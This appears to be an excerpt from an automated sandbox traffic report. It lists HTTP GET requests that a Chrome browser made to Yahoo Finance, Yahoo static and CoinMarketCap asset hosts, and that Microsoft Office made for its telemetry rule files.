Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/control.CYgJF_JY.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/entry/app.CVwJvP7d.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cv/apiv2/finance/fonts/GT-America-Standard-Regular.woff2 HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://finance.yahoo.com/assets/_app/immutable/assets/PageProgressBar.DFY6QScX.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/preload-helper.D6kgxu3v.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /ok/u/assets/img/spinner-24x24-anim.gif HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://finance.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/commonUtil.CI22_Irn.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/entry/start.CnQ-Ug7B.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/stores.DPDRpTFd.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/quoteUtil.DBZgD1yl.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cv/apiv2/finance/fonts/GT-America-Standard-Medium.woff2 HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://finance.yahoo.com/assets/_app/immutable/assets/PageProgressBar.DFY6QScX.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/loadQuoteType.mGEeGxqN.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /cv/apiv2/finance/gtfont/GT-America-Bold.woff2 HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://finance.yahoo.com/assets/_app/immutable/assets/PageProgressBar.DFY6QScX.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/825.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/1027.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/logUtil.hOue7iAU.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /cv/apiv2/finance/fonts/GT-America-Condensed-Bold.woff2 HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://finance.yahoo.com/assets/_app/immutable/assets/PageProgressBar.DFY6QScX.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/1.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/img/coins/64x64/1839.png HTTP/1.1Host: s2.coinmarketcap.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://finance.yahoo.com/markets/crypto/all/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/scheduler.Dr9AAxFe.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/43.CtYdpA_T.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/control.CYgJF_JY.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/entry/app.CVwJvP7d.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/preload-helper.D6kgxu3v.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/index.g5YcAAdQ.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /ok/u/assets/img/spinner-24x24-anim.gif HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/index.DCSmZEjO.js HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://finance.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/chunks/commonUtil.CI22_Irn.js HTTP/1.1Host: finance.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
